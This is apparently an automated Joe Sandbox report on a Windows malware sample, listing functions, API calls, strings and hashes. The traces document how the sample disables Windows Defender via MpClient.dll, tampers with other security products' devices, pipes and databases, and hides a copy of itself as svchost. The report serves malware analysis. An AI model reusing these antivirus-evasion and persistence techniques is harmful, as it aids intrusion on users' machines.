                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                                    • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                                    • API String ID: 33631002-3172865025
                                                                                                                                                                                                                    • Opcode ID: 9681e669b6bc70e9123dd5980162aec26310b354dbad36ed1e8ea522fa3927e4
                                                                                                                                                                                                                    • Instruction ID: e7d083a3d342eb0d1741576d2c48f75b21a67eac2e30cb69abab2c03069a185e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9681e669b6bc70e9123dd5980162aec26310b354dbad36ed1e8ea522fa3927e4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 384184B0D01358DEEB20CF959988BDEFEB5BB04308F5081AED5186B281C7B90A89CF55
                                                                                                                                                                                                                    Function 00401A30 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 103memoryfilelibraryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 153 401a30-401a45 154 401b53-401b59 153->154 155 401a4b-401a58 call 4010a0 153->155 155->154 158 401a5e-401a69 RtlImageNtHeader 155->158 159 401b31-401b45 GetProcessHeap HeapValidate 158->159 160 401a6f-401a90 GetTickCount GetModuleHandleA 158->160 159->154 161 401b47-401b4d GetProcessHeap RtlFreeHeap 159->161 162 401a92-401aa0 GetProcAddress 160->162 163 401aa9-401ac4 160->163 161->154 162->163 165 401aa2 162->165 163->159 164 401ac6-401ae7 CreateFileA 163->164 164->159 166 401ae9-401b01 WriteFile 164->166 165->163 167 401b03-401b04 SetEndOfFile 166->167 168 401b0a-401b13 166->168 167->168 168->159 169 401b15-401b22 GetHandleInformation 168->169 169->159 170 401b24-401b28 169->170 170->159 171 401b2a-401b2b CloseHandle 170->171 171->159
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004010A0: CreateFileA.KERNELBASE('+@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00401A54,00000000,00000000,?,00000000), ref: 004010C6
                                                                                                                                                                                                                      • Part of subcall function 004010A0: GetFileSizeEx.KERNEL32(00000000,00401A54,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010E7
                                                                                                                                                                                                                      • Part of subcall function 004010A0: GetProcessHeap.KERNEL32(00000008,00401A67,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010FD
                                                                                                                                                                                                                      • Part of subcall function 004010A0: RtlAllocateHeap.NTDLL(00000000,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 00401104
                                                                                                                                                                                                                      • Part of subcall function 004010A0: memset.MSVCRT ref: 00401114
                                                                                                                                                                                                                      • Part of subcall function 004010A0: ReadFile.KERNELBASE(?,00000000,00401A54,00000000,00000000,?,?,?,?,00401A54), ref: 00401133
                                                                                                                                                                                                                      • Part of subcall function 004010A0: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401145
                                                                                                                                                                                                                      • Part of subcall function 004010A0: HeapValidate.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401148
                                                                                                                                                                                                                      • Part of subcall function 004010A0: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401155
                                                                                                                                                                                                                      • Part of subcall function 004010A0: HeapFree.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401158
                                                                                                                                                                                                                      • Part of subcall function 004010A0: GetHandleInformation.KERNEL32(00000000,00000000,?,00401A54,00000000,00000000), ref: 00401173
                                                                                                                                                                                                                      • Part of subcall function 004010A0: CloseHandle.KERNELBASE(00000000,?,00401A54,00000000,00000000), ref: 00401184
                                                                                                                                                                                                                      • Part of subcall function 004010A0: IsBadWritePtr.KERNEL32(?,00000004), ref: 00401194
                                                                                                                                                                                                                    • RtlImageNtHeader.NTDLL(00000000), ref: 00401A5F
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00401A77
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401A88
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401A98
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 00401ADC
                                                                                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000000,00000000), ref: 00401AF9
                                                                                                                                                                                                                    • SetEndOfFile.KERNELBASE(00000000), ref: 00401B04
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401B1A
                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 00401B2B
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B3A
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 00401B3D
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401B4A
                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000), ref: 00401B4D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$File$HandleProcess$CloseCreateFreeInformationValidateWrite$AddressAllocateCountHeaderImageModuleProcReadSizeTickmemset
                                                                                                                                                                                                                    • String ID: '+@$RtlUniform$ntdll.dll
                                                                                                                                                                                                                    • API String ID: 444222748-2605303930
                                                                                                                                                                                                                    • Opcode ID: a684177415ef1389c265edc60bbb787380eb140592000129f1f3a54920f38112
                                                                                                                                                                                                                    • Instruction ID: 5333274c7b5ae32bd68dbaed39568bfcb3f6f97b50696231050ce748e7cb221e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a684177415ef1389c265edc60bbb787380eb140592000129f1f3a54920f38112
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 083181B1601304ABE710AB75DD49F5B3AACAB84755F458136FF05F72E0EB78D9008AA8
                                                                                                                                                                                                                    Function 004010A0 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 111memoryfileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 179 4010a0-4010af 180 4010b5-4010d4 CreateFileA 179->180 181 40118a-40118f 179->181 180->181 184 4010da-4010f2 GetFileSizeEx 180->184 182 401191-40119e IsBadWritePtr 181->182 183 4011ab 181->183 185 4011a0-4011a8 182->185 186 4011ad-4011b3 182->186 183->186 187 401163-40116c 184->187 188 4010f4-40110e GetProcessHeap RtlAllocateHeap 184->188 187->181 189 40116e-40117b GetHandleInformation 187->189 190 401160 188->190 191 401110-40111e memset 188->191 189->181 192 40117d-401181 189->192 190->187 191->190 193 401120-40113b ReadFile 191->193 192->181 195 401183-401184 CloseHandle 192->195 193->190 194 40113d-401150 GetProcessHeap HeapValidate 193->194 196 401152-401158 GetProcessHeap HeapFree 194->196 197 40115e 194->197 195->181 196->197 197->190
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE('+@,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00401A54,00000000,00000000,?,00000000), ref: 004010C6
                                                                                                                                                                                                                    • GetFileSizeEx.KERNEL32(00000000,00401A54,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010E7
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00401A67,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 004010FD
                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00401A54,00000000,00000000,?,00000000,00402B27), ref: 00401104
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401114
                                                                                                                                                                                                                    • ReadFile.KERNELBASE(?,00000000,00401A54,00000000,00000000,?,?,?,?,00401A54), ref: 00401133
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401145
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401148
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00401A54), ref: 00401155
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,?,?,00401A54), ref: 00401158
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000,?,00401A54,00000000,00000000), ref: 00401173
                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000,?,00401A54,00000000,00000000), ref: 00401184
                                                                                                                                                                                                                    • IsBadWritePtr.KERNEL32(?,00000004), ref: 00401194
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$FileProcess$Handle$AllocateCloseCreateFreeInformationReadSizeValidateWritememset
                                                                                                                                                                                                                    • String ID: '+@
                                                                                                                                                                                                                    • API String ID: 995291462-3270456718
                                                                                                                                                                                                                    • Opcode ID: 8acb88134f09bb4553fa1f20c980ac2f479e22f48b63d87f01b3e3b6e2272333
                                                                                                                                                                                                                    • Instruction ID: 9704cbedb43cf1f0123ea2a6f6cc4f04c30b9336f8140f0f9319c9250b15b478
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8acb88134f09bb4553fa1f20c980ac2f479e22f48b63d87f01b3e3b6e2272333
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF3176B2A01214ABD7109BA59D48F6B7B6CEB88B51F144236FF04F7290D7349D0186A8
                                                                                                                                                                                                                    Function 00401FC0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 68libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 210 401fc0-40201c memset SHGetFolderPathA 211 402087-402089 210->211 212 40201e-40203f PathAppendA SetCurrentDirectoryA 210->212 213 402092-4020a2 211->213 214 40208b-40208c FreeLibrary 211->214 212->211 215 402041-402053 LoadLibraryA 212->215 214->213 215->211 216 402055-402063 GetProcAddress 215->216 216->211 217 402065-402072 216->217 217->211
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00401FFE
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00402014
                                                                                                                                                                                                                    • PathAppendA.SHLWAPI(?,Windows Defender), ref: 0040202A
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?), ref: 00402037
                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(MpClient.dll), ref: 00402046
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,WDEnable), ref: 0040205B
                                                                                                                                                                                                                    • FreeLibrary.KERNELBASE(00000000), ref: 0040208C
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryPath$AddressAppendCurrentDirectoryFolderFreeLoadProcmemset
                                                                                                                                                                                                                    • String ID: MpClient.dll$V,@$WDEnable$Windows Defender
                                                                                                                                                                                                                    • API String ID: 1010965793-4204822615
                                                                                                                                                                                                                    • Opcode ID: 3df85f3b417d1b5c3b465db41dcca31682b6cff8283aa0f7457e6563496e2944
                                                                                                                                                                                                                    • Instruction ID: d5d199d1064221ab56ad58356cdb5c20067bd4798bc980eb12739ab0272296c4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3df85f3b417d1b5c3b465db41dcca31682b6cff8283aa0f7457e6563496e2944
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E711A8B1900355ABC7219F649D49FABBB7CFB48751F10067AFB55B21D0D6784E008AA8
                                                                                                                                                                                                                    Function 00402560 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 228commemoryCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 219 402560-40258c CoInitializeEx 220 40258e-402591 219->220 221 40259f-4025c7 GetModuleFileNameW SysAllocString 219->221 220->221 222 402593-402599 220->222 223 402749-40274f 221->223 224 4025cd-4025d8 SysAllocString 221->224 222->221 225 4027a4-4027a9 222->225 226 402751-402756 223->226 227 402759-40275e 223->227 228 402733-402741 SysFreeString 224->228 229 4025de-4025ff CoCreateInstance 224->229 226->227 232 402760-402765 227->232 233 402768-40276d 227->233 230 402743-402744 SysFreeString 228->230 231 402746 228->231 234 402605-40260a 229->234 235 402707-40270a 229->235 230->231 231->223 232->233 236 402777-40277c 233->236 237 40276f-402774 233->237 234->235 238 402610-402621 234->238 235->228 239 402786-40278b 236->239 240 40277e-402783 236->240 237->236 238->228 244 402627-402638 238->244 242 402795-402797 239->242 243 40278d-402792 239->243 240->239 245 402799-40279c 242->245 246 40279e CoUninitialize 242->246 243->242 244->228 248 40263e-402648 244->248 245->225 245->246 246->225 249 40264d-40264f 248->249 249->228 250 402655-40265c 249->250 251 402731 250->251 252 402662-402673 250->252 251->228 252->251 254 402679-402691 252->254 256 402693-4026b3 CoCreateInstance 254->256 257 40270c-40271d 254->257 258 4026b5-4026ba 256->258 259 4026bc 256->259 257->251 263 40271f-402723 257->263 258->259 260 4026be-4026c3 258->260 259->260 260->251 262 4026c5-4026d0 260->262 262->251 266 4026d2-4026e3 262->266 263->251 264 402725-40272e 263->264 264->251 266->251 268 4026e5-4026f4 266->268 268->251 270 4026f6-402705 268->270 270->251
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040257F
                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000), ref: 004025AD
                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(?), ref: 004025C0
                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(Windows Explorer), ref: 004025D2
                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00404E10,00000000,00004401,00404E20,?), ref: 004025FB
                                                                                                                                                                                                                    • CoCreateInstance.OLE32(00404E30,00000000,00004401,00404E40,?), ref: 004026AF
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00402C95), ref: 0040273D
                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00402744
                                                                                                                                                                                                                    • CoUninitialize.COMBASE ref: 0040279E
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: String$AllocCreateFreeInstance$FileInitializeModuleNameUninitialize
                                                                                                                                                                                                                    • String ID: Windows Explorer
                                                                                                                                                                                                                    • API String ID: 1140695583-228612681
                                                                                                                                                                                                                    • Opcode ID: f4cedc7bac158036922e6c1ea2cc3172f771719353f965fc279a44cca6b87cc4
                                                                                                                                                                                                                    • Instruction ID: b0f249d7cb80b728101da8bc3454e37707d64e119a9c5dc6a768cd6d24ad7165
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4cedc7bac158036922e6c1ea2cc3172f771719353f965fc279a44cca6b87cc4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ED712D74A00606AFCB10DB99CD84DAFB7B9AF88704B2441A6E504FB3D4D7B5ED42CB94
                                                                                                                                                                                                                    Function 00402240 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 74filetimeCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 300 402240-4022e1 CreateFileA 301 4022e3-402323 WriteFile GetSystemTimeAsFileTime WriteFile CloseHandle 300->301 302 402324-402329 300->302 301->302
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(\\.\pipe\acsipc_server,C0000000,00000003,?,00000003,80000080,00000000,00000000), ref: 004022D6
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,D48A445E,00000028,?,00000000), ref: 004022F6
                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?), ref: 004022FC
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,B5CB6C63,0000001C,?,00000000), ref: 0040231A
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0040231D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$TimeWrite$CloseCreateHandleSystem
                                                                                                                                                                                                                    • String ID: \\.\pipe\acsipc_server
                                                                                                                                                                                                                    • API String ID: 3225117150-898603304
                                                                                                                                                                                                                    • Opcode ID: f30bb11f5613f8d38f8c23486348982fdc31315c85d836d9b114ebf2302f727f
                                                                                                                                                                                                                    • Instruction ID: c460779fd0431372b53d2531d074c5320f53f755a2dac54515a3a2487e8d4eb8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f30bb11f5613f8d38f8c23486348982fdc31315c85d836d9b114ebf2302f727f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DA31F4B1C0121CAFDB10DFD5D985AEEFBB8FB48314F10422AE614BB280D7B41A458F95
                                                                                                                                                                                                                    Function 00402950 Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 223memorylibraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                    control_flow_graph 78 402950-4029ab VirtualQuery GetModuleFileNameA 79 4029b0-4029bd 78->79 79->79 80 4029bf-4029cc PathFileExistsA 79->80 81 4029d2-4029e6 GetSystemWindowsDirectoryA 80->81 82 402ad9-402b10 _snprintf CopyFileA 80->82 83 4029e7-4029ed 81->83 84 402c06-402c0c 82->84 85 402b16-402b37 call 402810 call 401a30 call 4010a0 82->85 83->83 86 4029ef-402a25 GetModuleHandleA 83->86 103 402b39-402b42 RtlImageNtHeader 85->103 104 402b7d-402bad call 401b60 MoveFileExA GetModuleHandleA 85->104 88 402a47-402a4b 86->88 89 402a27-402a37 GetProcAddress 86->89 92 402a76-402a8e GetTickCount call 4012a0 call 401330 88->92 93 402a4d-402a51 88->93 89->88 91 402a39-402a44 GetCurrentProcess 89->91 91->88 109 402a90-402a95 92->109 95 402a52-402a58 93->95 95->95 98 402a5a-402a74 95->98 98->82 107 402b44-402b56 call 401000 103->107 108 402b5d-402b70 GetProcessHeap HeapValidate 103->108 115 402bcf-402bd3 104->115 116 402baf-402bbf GetProcAddress 104->116 117 402b5b 107->117 108->104 110 402b72-402b77 GetProcessHeap RtlFreeHeap 108->110 109->109 113 402a97-402a9e 109->113 110->104 114 402aa0-402aa6 113->114 114->114 118 402aa8-402abd 114->118 120 402bd5-402bda call 4013c0 115->120 121 402bdf-402bed GlobalFindAtomA 115->121 116->115 119 402bc1-402bcc GetCurrentProcess 116->119 117->108 122 402ac0-402ac6 118->122 119->115 120->121 124 402bfb-402c00 GlobalAddAtomA 121->124 125 402bef-402bf5 call 4011c0 ExitProcess 121->125 122->122 126 402ac8-402ad6 122->126 124->84 126->82
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • VirtualQuery.KERNEL32(00401C30,?,0000001C,00000000,00000000,76D6DB30), ref: 0040298B
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004029A3
                                                                                                                                                                                                                    • PathFileExistsA.KERNELBASE(?), ref: 004029C4
                                                                                                                                                                                                                    • GetSystemWindowsDirectoryA.KERNEL32(?,00000104), ref: 004029DC
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402A1D
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402A2D
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 00402A3E
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00402A76
                                                                                                                                                                                                                      • Part of subcall function 004012A0: GetTickCount.KERNEL32 ref: 004012AB
                                                                                                                                                                                                                      • Part of subcall function 004012A0: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A82,00000000), ref: 004012BC
                                                                                                                                                                                                                      • Part of subcall function 004012A0: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 004012CC
                                                                                                                                                                                                                      • Part of subcall function 00401330: GetTickCount.KERNEL32 ref: 0040135A
                                                                                                                                                                                                                      • Part of subcall function 00401330: GetModuleHandleA.KERNEL32(ntdll.dll,?,00402A8E,-00000006,00000000), ref: 00401367
                                                                                                                                                                                                                      • Part of subcall function 00401330: GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401373
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 00402AF0
                                                                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 00402B08
                                                                                                                                                                                                                    • RtlImageNtHeader.NTDLL(00000000), ref: 00402B3A
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402B65
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 00402B68
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402B74
                                                                                                                                                                                                                    • RtlFreeHeap.NTDLL(00000000), ref: 00402B77
                                                                                                                                                                                                                    • MoveFileExA.KERNEL32(?,?,00000004(MOVEFILE_DELAY_UNTIL_REBOOT)), ref: 00402B96
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00402BA5
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00402BB5
                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 00402BC6
                                                                                                                                                                                                                    • GlobalFindAtomA.KERNEL32(Fri Jun 17 05:52:09 20111), ref: 00402BE4
                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00402BF5
                                                                                                                                                                                                                    • GlobalAddAtomA.KERNEL32(Fri Jun 17 05:52:09 20111), ref: 00402C00
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ModuleProcess$AddressFileHandleHeapProc$CountTick$AtomCurrentGlobal$CopyDirectoryExistsExitFindFreeHeaderImageMoveNamePathQuerySystemValidateVirtualWindows_snprintf
                                                                                                                                                                                                                    • String ID: %s_$.dat$Fri Jun 17 05:52:09 20111$IsWow64Process$\apppatch\$kernel32.dll$svchost.exe
                                                                                                                                                                                                                    • API String ID: 4049655197-4201755136
                                                                                                                                                                                                                    • Opcode ID: 76f81366a4f8225247b8614753da15890ae233e837e64cdd9c16a62ed84d21ea
                                                                                                                                                                                                                    • Instruction ID: 2b42465635bf5f89377a844675b664ed4d82d183fb77d3ed61f84ac94699b08c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 76f81366a4f8225247b8614753da15890ae233e837e64cdd9c16a62ed84d21ea
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A5718FB15143419BC310EF70DE8896B7BE9BBC8300B54493EF686B72A1D778D944CB99
                                                                                                                                                                                                                    Function 00402420 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 119fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040243C
                                                                                                                                                                                                                    • CreateFileA.KERNELBASE(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004024A0
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004024C3
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024D8
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 004024E4
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004024F3
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 004024FF
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040250E
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040251A
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402529
                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402535
                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402544
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00402547
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.2153786552.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000000.00000002.2153786552.000000000045B000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_UMwpXhA46R.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                                    • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                                    • API String ID: 606440919-2829233815
                                                                                                                                                                                                                    • Opcode ID: 8452569d89d16074c856ebe9e50090442212cf04daf89a05b4dc4c5533925dd3
                                                                                                                                                                                                                    • Instruction ID: da06213ca23f861e298ab990455e1520987101534f77d1697d18ba9606f76a1b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8452569d89d16074c856ebe9e50090442212cf04daf89a05b4dc4c5533925dd3
